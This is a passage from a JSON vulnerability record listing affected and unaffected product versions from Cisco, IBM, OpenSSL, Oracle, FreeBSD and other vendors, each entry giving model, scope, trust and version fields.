"vendor": "cisco", "version": "6.8" }, { "model": "qradar siem/qrif/qrm/qvm patch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.71" }, { "model": "digital media players series 5.3 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "telepresence profile series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.41" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "openssh for gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.11.6" }, { "model": "abyp-0t-0s-4l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "jabber for android mr", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "project openssl 1.0.2a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "abyp-4t-0s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "project openssl 1.0.2f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "connected grid router-cgos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2919" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "lancope stealthwatch smc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "telepresence server on virtual machine mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "anyconnect secure mobility client", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "unified ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69450" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60008.3" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30.2-9" }, { "model": "abyp-0t-2s-2l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70008.3" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.2" }, { "model": "webex meetings server ssl gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.25" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-110" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "ironport email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "prime collaboration provisioning", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.2" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-113" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "spa30x series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30-12" }, { "model": "webex meetings client on premises", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.3" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70100" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.3(1)" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "bm security identity governance and intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.12" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5(.1.131)" }, { "model": "project openssl 1.0.2d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.3" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1(1)" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "algo audit and compliance if", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.32" }, { "model": "spa525g", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.4" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "9.3-release-p25", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "abyp-0t-2s-2l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9971" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.29-9" }, { "model": "series ip phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "nexus series switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "abyp-2t-0s-2l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "spa112 2-port phone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.5" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.6" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3387" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.1.1" }, { "model": "telepresence server mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70104.2" }, { "model": "webex messenger service", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.20" }, { "model": "abyp-10g-4sr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "media experience engines", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "10.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.2" }, { "model": "mysql enterprise backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.10" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "connected grid router 15.6.2.15t", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media players series 5.4 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "telepresence server on multiparty media mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3204.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "hosted collaboration mediation fulfillment", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5:20" }, { "model": "jabber for mac", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "telepresence server on multiparty media mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3104.2" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70006.2.17" }, { "model": "digital media players series 5.3 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "project openssl 1.0.1n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3204.1" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "packet tracer", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.0" }, { "model": "network analysis module", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.3.1" }, { "model": "project openssl 1.0.1o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "unified wireless ip phone", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.5.1" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "security access manager for web", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "virtual security gateway vsg2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.17" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.1" }, { "model": "policy suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "webex meetings client on premises", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-2.7" }, { "model": "10.2-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "spa51x series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.55" }, { "model": "unified ip conference phone for third-party call control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "unified intelligence center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "telepresence server on virtual machine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.4" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.0.0" }, { "model": "common services platform collector", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.9.1" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.7" }, { "model": "project openssl 1.0.2e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(3.10000.9)" }, { "model": "hosted collaboration mediation fulfillment", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "project openssl 1.0.1q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "dcm series 9900-digital content manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.16" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.3" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.0" }, { "model": "tivoli provisioning manager for os deployment intirim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.133" }, { "model": "telepresence sx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "webex meetings client hosted", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "webex meetings for wp8", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-108" }, { "model": "sterling connect:express for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(2.1)" }, { "model": "webex meetings for wp8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.1" }, { "model": "physical access control gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "wide area application services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.5.7" }, { "model": "9.3-release-p24", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "webex messenger service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "10.1-release-p19", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mmp server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.10" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application and content networking system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.5.41" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "10.1-release-p30", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.2.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "intelligent automation for cloud", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "0.9.8" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "edge digital media player 1.6rb4 5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "mds series multilayer switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "abyp-10g-4sr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "9.3-release-p36", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.6" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.1" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30002.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.10" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.28" }, { "model": "webex meeting center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "partner supporting service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.11" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.29" }, { "model": "mobility services engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.0" }, { "model": "edge digital media player", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3401.2.0.20" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1" }, { "model": "abyp-0t-4s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "spa30x series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.8" }, { "model": "digital media players series 5.4 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.13" }, { "model": "10.2-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "42000" }, { "model": "security access manager for web", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.0" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "standalone rack server cimc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql enterprise backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.12.2" }, { "model": "intracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "jabber for apple ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.2" }, { "model": "video surveillance series high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "40002.4.7" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.7" }, { "model": "9.3-release-p33", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.5" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.07" }, { "model": "mq appliance m2001", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.24" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "84200" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ironport email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.2" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.112" }, { "model": "spa525g", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "mmp server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.0.5" }, { "model": "9.3-release-p41", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli netcool system service monitors fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "telepresence integrator c series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "lancope stealthwatch udp director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud object store", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.8" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "cognos business intelligence fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.12" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p25", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5.1.5" }, { "model": "registered envelope service", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "tivoli netcool system service monitors fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "tivoli netcool system service monitor fp14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "telepresence content server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.2" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.5(4)" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3104.4" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "mq appliance m2000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "asa cx and prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50003.5.12.21" }, { "model": "project openssl 1.0.1m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.1" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": 